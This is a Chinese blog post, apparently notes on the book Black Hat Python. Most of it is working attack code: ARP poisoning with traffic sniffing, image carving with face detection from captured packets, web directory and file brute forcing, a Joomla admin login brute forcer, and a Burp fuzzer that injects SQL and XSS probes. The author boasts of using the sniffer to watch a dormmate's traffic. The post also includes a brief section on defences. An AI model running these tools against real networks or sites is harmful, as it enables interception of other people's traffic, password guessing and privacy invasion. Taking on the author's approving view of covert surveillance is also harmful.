 def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):  
   
     # 构建欺骗目标的ARP请求()，这里没设置hwsrc,默认就是本机咯  
     # 简单来说：告诉被攻击机器，本机（攻击机）的mac是网关，就是攻击者的机器是网关  
     poison_target = ARP()  
     poison_target.op = 2                # 响应报文  
     poison_target.psrc = gateway_ip     # 模拟是网关发出的, 其实是我们的机器发出的  
     poison_target.pdst = target_ip      # 目的地是目标机器  
     poison_target.hwdst = target_mac    # 目标的物理地址是目标机器的mac  
   
     # 构建欺骗网关的ARP请求()，这里没设置hwsrc,默认就是本机咯  
     poison_gateway = ARP()  
     poison_gateway.op = 2               # 响应报文  
     poison_gateway.psrc = target_ip     # 模拟是目标机器发出的,  
     poison_gateway.pdst = gateway_ip    # 目的地是网关  
     poison_gateway.hwdst = gateway_mac  # 目标的物理地址是网关的mac  
   
     print "[*] Beginning the ARP poison. ［CTRL_C to stop］"  
   
     while True:  
         try:  
             # 开始发送ARP欺骗包(投毒)  
             send(poison_target)  
             send(poison_gateway)  
             # 停两秒  
             time.sleep(2)  
         except KeyboardInterrupt:  
             restore_target(gateway_ip, gateway_mac, target_ip, target_mac)  
   
     print "[*] ARP poison attack finished"  
     return  
   
   
   
   
   
 # 设置嗅探的网卡  
 conf.iface = interface  
   
 # 关闭输出  
 conf.verb = 0  
   
 print "[*] Setting up %s" % interface  
   
 # 获取网关mac  
 gateway_mac = get_mac(gateway_ip)  
   
 if gateway_mac is None:  
     print "[!!!] Failed to get gateway MAC. Exiting"  
     sys.exit(0)  
 else:  
     print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)  
   
 # 获取目标(被攻击的机器)mac  
 target_mac = get_mac(target_ip)  
   
 if target_mac is None:  
     print "[!!!] Failed to get target MAC. Exiting"  
     sys.exit(0)  
 else:  
     print "[*] Target %s is at %s" % (target_ip, target_mac)  
   
 # 启动ARP投毒（欺骗）线程  
 poison_thread = threading.Thread(target = poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))  
 poison_thread.start()  
   
 try:  
     print "[*] Starting sniffer for %d packets" % packet_count  
   
     bpf_filter = "ip host %s " % target_ip  # 过滤器  
     packets = sniff(count = packet_count, filter=bpf_filter, iface = interface)  
   
     # 将捕获到的数据包输出到文件  
     wrpcap("arper.pcap", packets)  
     # 还原网络配置  
     restore_target(gateway_ip, gateway_mac, target_ip, target_mac)  
   
 except KeyboardInterrupt:  
     # 还原网络配置  
     restore_target(gateway_ip, gateway_mac, target_ip, target_mac)  
     sys.exit(0)  

kali （攻击机）

winxp（被攻击机）

开始攻击

攻击结果：网关的ip已被替换成kali的mac了，有趣哦

还窃听到了目标机的网络数据流量，哈哈，用于宿舍，舍友的一举一动都知道了

从pcap文件中提取图片，同时进行人脸识别

安装OpenCV

[python]  view plain  copy 
      
 apt-get install python-opencv python-numpy python-scipy

代码

[python]  view plain  copy 
      
     
 #-*- coding:utf8 -*-  
   
   
 import re  
 import zlib  
 import cv2  
   
   
 from scapy.all import *  
   
   
 pictures_directory = "./pictures/"  
 faces_directory = "./faces/"  
 pcap_file = "test.pcap"  
   
   
 def get_http_headers(http_payload):  
     try:  
         #如果为http流量，提取http头  
         headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]  
   
   
         #对http头进行切分  
         headers = dict(re.findall(r"(?P.*?):(?P.*?)\r\n", headers_raw))  
   
   
     except:  
         return None  
   
   
     if "Content-Type" not in headers:  
         return None  
   
   
     return headers  
   
   
 def extract_image(headers, http_payload):  
     image = None  
     image_type = None  
   
   
     try:  
         if "image" in headers['Content-Type']:  
             #获取图像类型和图像数据  
             image_type = headers['Content-Type'].split("/")[1]  
             image = http_payload[http_payload.index("\r\n\r\n")+4:]  
             #如果数据进行了压缩则解压  
             try:  
                 if "Content-Encoding" in headers.keys():  
                     if headers['Content-Encoding'] == "gzip":  
                         image = zlib.decompress(image, 16+zlib.MAX_WBITS)  
                     elif headers['Content-Encoding'] == "deflate":  
                         image = zlib.decompress(image)  
             except:  
                 pass  
     except:  
         return None, None  
   
   
     return image,image_type  
   
   
 def face_detect(path, file_name):  
     img = cv2.imread(path)  
     cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")  
     rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))  
   
   
     if len(rects) == 0:  
         return False  
   
   
     rects[:, 2:] += rects[:, :2]  
   
   
     #对图像中的人脸进行高亮的显示处理  
     for x1, y1, x2, y2 in rects:  
         cv2.rectangle(img, (x1,y1), (x2,y2), (127,255,0), 2)  
   
   
     cv2.imwrite("%s／%s-%s" (faces_directory, pcap_file, file_name), img)  
     return True  
   
   
 def http_assembler(pcap_file):  
   
   
     carved_images = 0  
     faces_detected = 0  
   
   
     a = rdpcap(pcap_file)  
   
   
     sessions = a.sessions()  
   
   
     for session in sessions:  
         http_payload = ""  
         for packet in sessions[session]:  
             try:  
                 if packet[TCP].dport == 80 or packet[TCP].sport == 80:  
                     # 对数据组包  
                     http_payload += str(packet[TCP].payload)  
             except:  
                 pass  
   
   
         headers = get_http_headers(http_payload)  
   
   
         if headers is None:  
             continue  
         image, image_type = extract_image(headers, http_payload)  
         if image is not None and image_type is not None:  
             #　存储图像  
             file_name = "%s-pic_carver_%d.%s" % (pcap_file, carved_images, image_type)  
             fd = open("%s/%s" % (pictures_directory, file_name), "wb")  
   
   
             fd.write(image)  
             fd.close()  
   
   
             carved_images += 1  
   
   
             #开始人脸识别  
             try:  
                 result = face_detect("%s/%s" % (pictures_directory, file_name), file_name)  
                 if result is True:  
                     faces_detected += 1  
             except:  
                 pass  
   
   
     return carved_images, faces_detected  
   
   
 carved_images, faces_detected = http_assembler(pcap_file)  
   
   
 print "Extracted: %d images" % carved_images  
 print "Detected: %d faces" % faces_detected  

运行结果：（test.pcap是我访问百度图片抓的包，但真么没人脸的图片呢，我记得好像有的啊）

第五章 Web攻击

Web的套接字函数库：urllib2

下面为他们的简单使用

有时要根据你要抓取的网站的编码和自己代码的编码相对应

Web开源应用的安装

这里作者应该是利用开源应用的本地文件目录信息去访问目标网站的对应目录，看看哪些目录是跟官方的一样的，举个例子：比如有没有install目录

[python]  view plain  copy 
       
      
 #-*- coding:utf8 -*-  
   
 import Queue  
 import threading  
 import os  
 import urllib2  
   
 threads = 10  
   
 target = "http://192.168.1.105/Joomla/"  
 directory = "./Joomla/"  
 filters = ["jpg", ".gif", ".png", ".css"]  
   
 os.chdir(directory)  
 web_paths = Queue.Queue()  
   
 for r,d,f in os.walk("."):  
     for files in f:  
         remote_path = "%s%s" % (r,files)  
         if remote_path.startswith("."):  
             remote_path = remote_path[1:]  
         if os.path.splitext(files)[1] not in filters:  
             web_paths.put(remote_path)  
   
 def test_remote():  
     while not  web_paths.empty():  
         path = web_paths.get()  
         url = "%s%s" % (target, path)  
   
         request = urllib2.Request(url)  
   
         try:  
             response = urllib2.urlopen(request)  
             content = response.read()  
   
             print  "[%d] => %s" % (response.code, path)  
             response.close()  
   
         except urllib2.HTTPError as error:  
             print "Failed %s" % error.code  
             pass  
   
 for i in range(threads):  
     print "Spawning thread %d" % i  
     t = threading.Thread(target=test_remote)  
     t.start()  

我在真实机上安装了Joola3.4.8，跟着用虚拟机的kali去测试

暴力破解Web应用目录和文件

代码：

[python]  view plain  copy 
       
      
 #-*- coding:utf8 -*-    
     
 import urllib2    
 import threading    
 import Queue    
 import urllib    
     
 threads = 50    
 target_url = "http://testphp.vulnweb.com"    
 wordlist_file = "./all.txt"    
 resume = None   #作者说用于网络中断时，延续上一个尝试的字符串，而不用从头开始，这里好像没用到    
 user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"    
     
     
 def built_wordlist(wordlist_file):    
     #读入字典文件    
     fd = open(wordlist_file, "rb")    
     raw_words = fd.readlines()    
     fd.close()    
     
     found_resume = False    
     words = Queue.Queue()    
     
     for word in raw_words:    
         #删除字符串末尾的空格    
         word  = word.rstrip()    
         #如果是延续上一次  
         if resume is not None:    
     
             if found_resume:    
                 words.put(word)    
             else:    
                 if word == resume:    
                     found_resume = True    
                     print "Resuming wordlist from: %s" % resume    
         else:    
             words.put(word)    
     return words    
     
 def dir_bruter(word_queue, extentsions=None):    
     
     while not word_queue.empty():    
         attempt = word_queue.get()   
   
         #用于储存要尝试的url  
         attempt_list = []    
     
         #检查是否有文件扩展名，如果没有就是我们要爆破路径，否则爆破文件    
         if "." not in attempt:    
             attempt_list.append("/%s/" % attempt)    
         else:    
             attempt_list.append("/%s" % attempt)    
     
         #如果我们想暴力破解扩展名    
         if extentsions:    
             for extentsion in extentsions:    
                 attempt_list.append("/%s%s" % (attempt, extentsion))    
     
         #迭代我们要尝试的文件列表    
         for brute in attempt_list:    
             #构造url  
             url = "%s%s" % (target_url, urllib.quote(brute))    
             #print url    
             try:    
                 headers = {}    
                 headers['User-Agent'] = user_agent    
                 r = urllib2.Request(url, headers=headers)    
     
                 response = urllib2.urlopen(r)    
                 #print response.__dict__  
                 if len(response.read()):    
                     print "[%d] ＝＞　%s" % (response.code, url)   
             #用ｅ接收URLError的信息   
             except urllib2.URLError,e:    
                 # code属性存在，并且code不是404    
                 if hasattr(e, 'code') and e.code != 404:    
                     print "!!! %d => %s" % (e.code, url)    
                 pass    
     
     
 word_queue = built_wordlist(wordlist_file)    
 extentsions = [".php", ".bak", ".orig",".inc"]    
   
 #开启多线程扫描  
 for i in range(threads):    
     t = threading.Thread(target=dir_bruter, args=(word_queue, extentsions))    
     t.start()    

这里我学习到了一个方法，如果不知道一个对象有什么属性的时候，就 print 该对象.__dict__

运行结果（下面倒数第六行是手贱，焦点没回到真实机就按了截图的快捷键，不过也没什么影响）

暴力破解HTML表格认证

既然说到这就说说怎么防范吧：

[plain]  view plain  copy 
      
     
一个强大的用户名和密码，你的用户名让他猜不着，就已经很难突破了，为了安全起见，强大的密码也是必须的  
我们都知道很多网站登录都有验证码，一个强大的验证码咯，不然被识别了(这应该是数字图像的内容了)  
限制尝试登陆的次数  
限定ip登陆  
安装个安全狗什么？（这个随便说的，好像不行，防万能密码应该可以）  
使用一个随机生成的token [当客户端请求页面时，服务器会生成一个随机数Token，并且将Token放置到session{为了省资源也有储存在cookie中的}当中，然后将Token发给客户端（一般通过构造hidden表单）。下次客户端提交请求时，Token会随着表单一起提交到服务器端。]  

好，进入正题，首先当然是研究表单的源码

这四个隐藏的元素也要提交，不然100%不能登陆，最后那个MD5似的应该就是token，同时可看到提交地址：index.PHP，它同时处理登陆

作者给出的步骤如下：

[plain]  view plain  copy 
      
     
检索登录页面，接收所有返回的cookie  
从HTML中获取所有表单yuans  
在字典中设置需要猜测的用户名和密码  
发送HTTP POST数据包到登陆处理脚本，数据包含所有HTML表单元素值和cookie值  
测试是否登陆成功  

代码：

[python]  view plain  copy 
      
     
 #-*- coding:utf8 -*-  
   
 import urllib2  
 import urllib  
 import cookielib  
 import threading  
 import sys  
 import Queue  
   
 from HTMLParser import HTMLParser  
   
 #简要设置  
 user_thread = 10  
 username ="giantbranch"  
 wordlist_file ="./mydict.txt"  
 resume = None  
   
 #特点目标设置  
 target_url = "http://192.168.1.105/Joomla/administrator/index.php"  
 target_post = "http://192.168.1.105/Joomla/administrator/index.php"  
   
 username_field = "username"  
 password_field = "passwd"  
   
 #登陆成功后，title里面就有下面的文字，注意是语言是英文才是下面的哦　  
 success_check = "Administration - Control Panel"  
   
 class BruteParser(HTMLParser):  
     def __init__(self):  
         HTMLParser.__init__(self)  
         self.tag_results = {}  
   
     #当我们调用feed函数时，他将整个HTML文档传递进来并在遇到每个标签时调用下面这个函数(根据函数名就容易理解)  
     def handle_starttag(self, tag, attrs):  
         #判断是否是input标签  
         if tag == "input":  
             tag_name = None  
             tag_value = None  
             for name,value in attrs:  
                 #input标签里面不是有name,value,type等属性吗，这里只判断name和value  
                 #不过我觉得第二个if是多余的  
                 if name == "name":  
                     tag_name = value  
                 if name == "value":  
                     tag_value = value  
                 if tag_name is not None:  
                     self.tag_results[tag_name] = value  
   
 class Bruter(object):  
     def __init__(self, username, words):  
         self.username = username  
         self.password_q = words  
         self.found = False  
   
         print "Finished setting up for %s" % username  
   
     def run_bruteforce(self):  
         for i in range(user_thread):  
             t = threading.Thread(target=self.web_bruter)  
             t.start()  
   
     def web_bruter(self):  
         while not self.password_q.empty() and not self.found:  
             #从字典获取密码，并去除右边的空格  
             brute = self.password_q.get().rstrip()  
             #使用FileCookieJar类，将cookie值储存到文件，参数为文件名，可用于存取cookie  
             jar = cookielib.FileCookieJar("cookies")  
             #用上面的jar初始化urllib2打开器,这样下面请求url时，就会把cookie值存到那个文件中  
             opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))  
   
             response =opener.open(target_url)  
   
             page = response.read()  
   
             print  "Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())  
   
             #解析隐藏区域(表单)  
             parser = BruteParser()  
             parser.feed(page)  
   
             #已经含有隐藏表单的键值  
             post_tags = parser.tag_results  
   
             #添加我们的用户名和密码区域  
             post_tags[username_field] = self.username  
             post_tags[password_field] = brute  
   
             #输出post的数据(键值)  
             # for key,value in post_tags.items():  
             #     print key,':',value  
   
             #url编码post的数据，开始尝试登陆  
             login_data = urllib.urlencode(post_tags)  
             login_response =opener.open(target_post, login_data)  
             login_result = login_response.read()  
   
             #　判断是否登陆成功  
             if success_check in login_result:  
                 #设置为True，让循环结束  
                 self.found = True  
   
                 print "[*] Bruteforce successful."  
                 print "[*] Username: %s" % username  
                 print "[*] Password: %s" % brute  
                 print "[*] Waiting for other threads to exit..."  
   
 def built_wordlist(wordlist_file):  
     #读入字典文件  
     fd = open(wordlist_file, "rb")  
     raw_words = fd.readlines()  
     fd.close()  
   
     found_resume = False  
     words = Queue.Queue()  
   
     for word in raw_words:  
         #删除字符串末尾的空格  
         word  = word.rstrip()  
         #如果是延续上一次  
         if resume is not None:  
   
             if found_resume:  
                 words.put(word)  
             else:  
                 if word == resume:  
                     found_resume = True  
                     print "Resuming wordlist from: %s" % resume  
         else:  
             words.put(word)  
     return words  
   
 #构造字典  
 words = built_wordlist(wordlist_file)  
   
 #初始化Bruter类  
 bruter_obj = Bruter(username, words)  
 #调用run_bruteforce函数  
 bruter_obj.run_bruteforce()  

下面的可能对理解代码有帮助：

cookie没登陆就会有的了，你访问一下百度首页也有，就算你没登陆

下图为访问joomla的首页时的cookie(还没登陆)

登陆后

jar有什么用

作者验证登陆成功用的是title，觉得不是很靠谱

注：我的测试账号为： giantbranch 密码:test

期间出了不少错误：

1.一个是用户名，自己初始化joomla时设置的超级用户名是giantbranch，结果跟着作者admin了

2.跑了很久都没跑出来，正确的账号密码也不会停止

最后将post的数据打印出来才知道，密码域的名字打错了

最终运行结果：（只展示部分）

终于成功了

第六章扩展Burp

这里应该要首先熟悉使用Brup

配置

下载jython，或者我文章开头的源码码那里有

打开软件，这必须的，一张图秒懂吧~~

Brup模糊测试

下面两个是Burp的IIntruderPayloadGeneratorFactory类和IIntruderPayloadGenerator的API文档，我们要对这些类进行扩展，重载他们的某些方法

[java]  view plain  copy 
       
      
 package burp;     
 /* 
  * @(#)IIntruderPayloadGeneratorFactory.java 
  * Copyright PortSwigger Ltd. All rights reserved. 
  * This code may be used to extend the functionality of Burp Suite Free Edition 
  * and Burp Suite Professional, provided that this usage does not violate the 
  * license terms for those products. 
     //代码用于扩展免费和专业版，但不要违反许可证 
  */  
 /* 
  * Extensions can implement this interface and then call 
  * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory() 
  * to register a factory for custom Intruder payloads. 
     //告诉我们要调用IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory()函数去注册，这样Intruder才能生成攻击载荷 
  */  
 public interface IIntruderPayloadGeneratorFactory  
 {  
     /** 
      * This method is used by Burp to obtain the name of the payload generator. 
      * This will be displayed as an option within the Intruder UI when the user 
      * selects to use extension-generated payloads. 
      * @return The name of the payload generator. 
      */  
     //这函数就是返回payload发生器的名称  
     String getGeneratorName();  
     /*  
      * This method is used by Burp when the user starts an Intruder attack that  
      * uses this payload generator.  
         //用于用户开始Intruder攻击时使用这个payload发生器  
      *  
     //参数  
      * @param attack An  
      * IIntruderAttack object that can be queried to obtain details  
      * about the attack in which the payload generator will be used.      
     //返回值  
      * @return A new instance of  
      * IIntruderPayloadGenerator that will be used to generate  
      * payloads for the attack.  
     IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack);  
 }  

[java]  view plain  copy 
       
      
 package burp;  
 /* 
  * @(#)IIntruderPayloadGenerator.java 
  * Copyright PortSwigger Ltd. All rights reserved. 
  * This code may be used to extend the functionality of Burp Suite Free Edition 
  * and Burp Suite Professional, provided that this usage does not violate the 
  * license terms for those products. 
  */  
 /** 
  * This interface is used for custom Intruder payload generators. Extensions 
  * that have registered an 
  * IIntruderPayloadGeneratorFactory must return a new instance of 
  * this interface when required as part of a new Intruder attack. 
  */  
 public interface IIntruderPayloadGenerator  
 {  
     /* 
     //这个函数用于决定是否提供更多的payload，就是还有没有咯 
      * This method is used by Burp to determine whether the payload generator is 
      * able to provide any further payloads. 
      * 
     //返回值 
      * @return Extensions should return 
      * false when all the available payloads have been used up, 
      * otherwise 
      * true. 
      */  
     boolean hasMorePayloads();  
     /* 
     //这函数用于获得下一个payload 
      * This method is used by Burp to obtain the value of the next payload. 
      * @param baseValue The base value of the current payload position. This 
      * value may be 
      * null if the concept of a base value is not applicable (e.g. 
      * in a battering ram attack). 
      * @return The next payload to use in the attack. 
      */  
     byte[] getNextPayload(byte[] baseValue);  
     /* 
     //这函数用于重置payload发生器，就是重置后，回头从第一个payload开始尝试 
      * This method is used by Burp to reset the state of the payload generator 
      * so that the next call to 
      * getNextPayload() returns the first payload again. This 
      * method will be invoked when an attack uses the same payload generator for 
      * more than one payload position, for example in a sniper attack. 
      */  
     void reset();  
   
 }  

代码:

[python]  view plain  copy 
       
      
 #-*- coding:utf8 -*-  
   
 # 导入三个类，其中IBurpExtender类是编写扩展工具必须的类，后两个是Intruder的，我们就是要扩展它  
 from burp import IBurpExtender  
 from burp import IIntruderPayloadGeneratorFactory  
 from burp import IIntruderPayloadGenerator  
   
 from java.util import List, ArrayList  
   
 import random  
   
 #定义自己的BurpExtender类，继承和扩展IBurpExtender和IIntruderPayloadGeneratorFactory类  
 class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory):  
   
     def registerExtenderCallbacks(self, callbacks):  
         self._callbacks = callbacks  
         self._helpers = callbacks.getHelpers()  
   
         #用registerIntruderPayloadGeneratorFactory函数注册BurpExtender类，这样Intruder才能生成攻击载荷  
         callbacks.registerIntruderPayloadGeneratorFactory(self)  
   
         return  
   
     #返回载荷生成器的名称  
     def getGeneratorName(self):  
         return "BHP Payload Generator"  
   
     # 接受攻击相关参数，返回IIntruderPayloadGenerator类型的实例，作者将他命名为BHPFuzzer  
     def createNewInstance(self, attack):  
         return BHPFuzzer(self, attack)  
   
 # 定义BHPFuzzer类，扩展了IIntruderPayloadGenerator类  
 # 增加了max_payload(最大的payload), num_iterations(迭代次数)两个变量，用于控制模糊测试的次数  
 class BHPFuzzer(IIntruderPayloadGenerator):  
     def __init__(self, extender, attack):  
         self._extender = extender  
         self._helpers = extender._helpers  
         self._attack = attack  
         self.max_payload = 1000  
         self.num_iterations = 0  
         return  
   
     # 通过比较判断迭代是否达到上限  
     def hasMorePayloads(self):  
         if self.num_iterations == self.max_payload:  
             return False  
         else:  
             return True  
   
     # 接受原始的HTTP负载，current_payload是数组，转化成字符串，传递给模糊测试函数mutate_payload  
     def getNextPayload(self, current_payload):  
         # 转换成字符串  
         payload = "".join(chr(x) for x in current_payload)  
         # 调用简单的变形器对POST请求进行模糊测试  
         payload = self.mutate_payload(payload)  
         # 增加FUZZ的次数  
         self.num_iterations += 1  
         return payload  
   
     # 重置  
     def reset(self):  
         self.num_iterations = 0  
         return  
   
     def mutate_payload(self, original_payload):  
         # 仅生成随机数或者调用一个外部脚本  
         picker = random.randint(1,3)  
   
         # 再载荷中选取一个随机的偏移量去变形  
         offset = random.randint(0, len(original_payload)-1)  
         payload = original_payload[:offset]  
   
         # 在随机偏移位置插入SQL注入尝试  
         if picker == 1:  
             payload += "'"  
   
         # 插入跨站尝试  
         if picker == 2:  
             payload += ""  
   
         # 随机重复原始载荷  
         if picker == 3:  
             chunk_length = random.randint(len(payload[offset:]), len(payload)-1)  
             repeater = random.randint(1,10)  
   
             for i in range(repeater):  
                 payload += original_payload[offset:offset+chunk_length]  
   
   
         # 添加载荷中剩余的字节  
         payload += original_payload[offset:]  
   

你可能感兴趣的:(linux,kali,python,黑帽)

android系统selinux中添加新属性property 辉色投像
1.定位/android/system/sepolicy/private/property_contexts声明属性开头：persist.charge声明属性类型：u:object_r:system_prop:s0图12.定位到android/system/sepolicy/public/domain.te删除neverallow{domain-init}default_prop:property
理解Gunicorn：Python WSGI服务器的基石范范0825 ipython linux 运维
理解Gunicorn：PythonWSGI服务器的基石介绍Gunicorn，全称GreenUnicorn，是一个为PythonWSGI（WebServerGatewayInterface）应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具，Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置，帮助初学者快速上手。1.什么是Gunico
Linux下QT开发的动态库界面弹出操作（SDL2） 13jjyao QT类 qt 开发语言 sdl2 linux
需求：操作系统为linux，开发框架为qt，做成需带界面的qt动态库，调用方为java等非qt程序难点：调用方为java等非qt程序，也就是说调用方肯定不带QApplication::exec()，缺少了这个，QTimer等事件和QT创建的窗口将不能弹出(包括opencv也是不能弹出)；这与qt调用本身qt库是有本质的区别的思路：1.调用方缺QApplication::exec()，那么我们在接口
Python数据分析与可视化实战指南 William数据分析 python python 数据
在数据驱动的时代，Python因其简洁的语法、强大的库生态系统以及活跃的社区，成为了数据分析与可视化的首选语言。本文将通过一个详细的案例，带领大家学习如何使用Python进行数据分析，并通过可视化来直观呈现分析结果。一、环境准备1.1安装必要库在开始数据分析和可视化之前，我们需要安装一些常用的库。主要包括pandas、numpy、matplotlib和seaborn等。这些库分别用于数据处理、数学
python os.environ 江湖偌大 python 深度学习
os.environ['TF_CPP_MIN_LOG_LEVEL']='0'#默认值，输出所有信息os.environ['TF_CPP_MIN_LOG_LEVEL']='1'#屏蔽通知信息（INFO）os.environ['TF_CPP_MIN_LOG_LEVEL']='2'#屏蔽通知信息和警告信息（INFO\WARNING）os.environ['TF_CPP_MIN_LOG_LEVEL']='
Python中os.environ基本介绍及使用方法鹤冲天Pro #Python python 服务器开发语言
文章目录python中os.environos.environ简介os.environ进行环境变量的增删改查python中os.environ的使用详解1.简介2.key字段详解2.1常见key字段3.os.environ.get()用法4.环境变量的增删改查和判断是否存在4.1新增环境变量4.2更新环境变量4.3获取环境变量4.4删除环境变量4.5判断环境变量是否存在python中os.envi
Pyecharts数据可视化大屏：打造沉浸式数据分析体验我的运维人生信息可视化数据分析数据挖掘运维开发技术共享
Pyecharts数据可视化大屏：打造沉浸式数据分析体验在当今这个数据驱动的时代，如何将海量数据以直观、生动的方式展现出来，成为了数据分析师和企业决策者关注的焦点。Pyecharts，作为一款基于Python的开源数据可视化库，凭借其丰富的图表类型、灵活的配置选项以及高度的定制化能力，成为了构建数据可视化大屏的理想选择。本文将深入探讨如何利用Pyecharts打造数据可视化大屏，并通过实际代码案例
linux sdl windows.h,Windows下的SDL安装奔跑吧linux内核 linux sdl windows.h
首先你要下载并安装SDL开发包。如果装在C盘下，路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤：1.打开VC++，点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4，现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
Python教程：一文了解使用Python处理XPath 旦莫 Python进阶 python 开发语言
目录1.环境准备1.1安装lxml1.2验证安装2.XPath基础2.1什么是XPath？2.2XPath语法2.3示例XML文档3.使用lxml解析XML3.1解析XML文档3.2查看解析结果4.XPath查询4.1基本路径查询4.2使用属性查询4.3查询多个节点5.XPath的高级用法5.1使用逻辑运算符5.2使用函数6.实战案例6.1从网页抓取数据6.1.1安装Requests库6.1.2代
python os.environ_python os.environ 读取和设置环境变量 weixin_39605414 python os.environ
>>>importos>>>os.environ.keys()['LC_NUMERIC','GOPATH','GOROOT','GOBIN','LESSOPEN','SSH_CLIENT','LOGNAME','USER','HOME','LC_PAPER','PATH','DISPLAY','LANG','TERM','SHELL','J2REDIR','LC_MONETARY','QT_QPA
linux中sdl的使用教程,sdl使用入门 Melissa Corvinus linux中sdl的使用教程
本文通过一个简单示例讲解SDL的基本使用流程。示例中展示一个窗口，窗口里面有个随机颜色快随机移动。当我们鼠标点击关闭按钮时间窗口关闭。基本步骤如下：1.初始化SDL并创建一个窗口。SDL_Init()初始化SDL_CreateWindow()创建窗口2.纹理渲染存储RGB和存储纹理的区别：比如一个从左到右由红色渐变到蓝色的矩形，用存储RGB的话就需要把矩形中每个点的具体颜色值存储下来；而纹理只是一
PHP环境搭建详细教程好看资源平台前端 php
PHP是一个流行的服务器端脚本语言，广泛用于Web开发。为了使PHP能够在本地或服务器上运行，我们需要搭建一个合适的PHP环境。本教程将结合最新资料，介绍在不同操作系统上搭建PHP开发环境的多种方法，包括Windows、macOS和Linux系统的安装步骤，以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类：集成开发环境：例如XAMPP、WAMP、MAMP，这
使用 FinalShell 进行远程连接（ssh 远程连接 Linux 服务器）编程经验分享开发工具服务器 ssh linux
目录前言基本使用教程新建远程连接连接主机自定义命令路由追踪前言后端开发，必然需要和服务器打交道，部署应用，排查问题，查看运行日志等等。一般服务器都是集中部署在机房中，也有一些直接是云服务器，总而言之，程序员不可能直接和服务器直接操作，一般都是通过ssh连接来登录服务器。刚接触远程连接时，使用的是XSHELL来远程连接服务器，连接上就能够操作远程服务器了，但是仅用XSHELL并没有上传下载文件的功能
使用Faiss进行高效相似度搜索 llzwxh888 faiss python
在现代AI应用中，快速和高效的相似度搜索是至关重要的。Faiss（FacebookAISimilaritySearch）是一个专门用于快速相似度搜索和聚类的库，特别适用于高维向量。本文将介绍如何使用Faiss来进行相似度搜索，并结合Python代码演示其基本用法。什么是Faiss？Faiss是一个由FacebookAIResearch团队开发的开源库，主要用于高维向量的相似性搜索和聚类。Faiss
python是什么意思中文-在python中%是什么意思编程大乐趣
Python中%有两种：1、数值运算：%代表取模，返回除法的余数。如：>>>7%212、%操作符（字符串格式化，stringformatting），说明如下：%[(name)][flags][width].[precision]typecode(name)为命名flags可以有+，-，''或0。+表示右对齐。-表示左对齐。''为一个空格，表示在正数的左侧填充一个空格，从而与负数对齐。0表示使用0填
Day1笔记-Python简介&标识符和关键字&输入输出 ~在杰难逃~ Python python 开发语言大数据数据分析数据挖掘
大家好，从今天开始呢，杰哥开展一个新的专栏，当然，数据分析部分也会不定时更新的，这个新的专栏主要是讲解一些Python的基础语法和知识，帮助0基础的小伙伴入门和学习Python，感兴趣的小伙伴可以开始认真学习啦！一、Python简介【了解】1.计算机工作原理编程语言就是用来定义计算机程序的形式语言。我们通过编程语言来编写程序代码，再通过语言处理程序执行向计算机发送指令，让计算机完成对应的工作，编程
python八股文面试题分享及解析(1) Shawn________ python
#1.'''a=1b=2不用中间变量交换a和b'''#1.a=1b=2a,b=b,aprint(a)print(b)结果：21#2.ll=[]foriinrange(3):ll.append({'num':i})print(11)结果:#[{'num':0},{'num':1},{'num':2}]#3.kk=[]a={'num':0}foriinrange(3):#0,12#可变类型，不仅仅改变
每日算法&面试题，大厂特训二十八天——第二十天（树）肥学 ⚡算法题⚡面试题每日精进 java 算法数据结构
目录标题导读算法特训二十八天面试题点击直接资料领取导读肥友们为了更好的去帮助新同学适应算法和面试题，最近我们开始进行专项突击一步一步来。上一期我们完成了动态规划二十一天现在我们进行下一项对各类算法进行二十八天的一个小总结。还在等什么快来一起肥学进行二十八天挑战吧！！特别介绍小白练手专栏，适合刚入手的新人欢迎订阅编程小白进阶python有趣练手项目里面包括了像《机器人尬聊》《恶搞程序》这样的有趣文章
Python快速入门 —— 第三节：类与对象孤华暗香 Python快速入门 python 开发语言
第三节：类与对象目标：了解面向对象编程的基础概念，并学会如何定义类和创建对象。内容：类与对象：定义类：class关键字。类的构造函数：__init__()。类的属性和方法。对象的创建与使用。示例：classStudent:def__init__(self,name,age,major):self.name&#
libyuv之linux编译 jaronho Linux linux 运维服务器
文章目录一、下载源码二、编译源码三、注意事项1、银河麒麟系统（aarch64）（1）解决armv8-a+dotprod+i8mm指令集支持问题（2）解决armv9-a+sve2指令集支持问题一、下载源码到GitHub网站下载https://github.com/lemenkov/libyuv源码，或者用直接用git克隆到本地，如：gitclonehttps://github.com/lemenko
pyecharts——绘制柱形图折线图 2224070247 信息可视化 python java 数据可视化
一、pyecharts概述自2013年6月百度EFE(ExcellentFrontEnd）数据可视化团队研发的ECharts1.0发布到GitHub网站以来，ECharts一直备受业界权威的关注并获得广泛好评，成为目前成熟且流行的数据可视化图表工具，被应用到诸多数据可视化的开发领域。Python作为数据分析领域最受欢迎的语言，也加入ECharts的使用行列，并研发出方便Python开发者使用的数据
Python 实现图片裁剪（附代码） | Python工具剑客阿良_ALiang
前言本文提供将图片按照自定义尺寸进行裁剪的工具方法，一如既往的实用主义。环境依赖ffmpeg环境安装，可以参考我的另一篇文章：windowsffmpeg安装部署_阿良的博客-CSDN博客本文主要使用到的不是ffmpeg，而是ffprobe也在上面这篇文章中的zip包中。ffmpy安装：pipinstallffmpy-ihttps://pypi.douban.com/simple代码不废话了，上代码
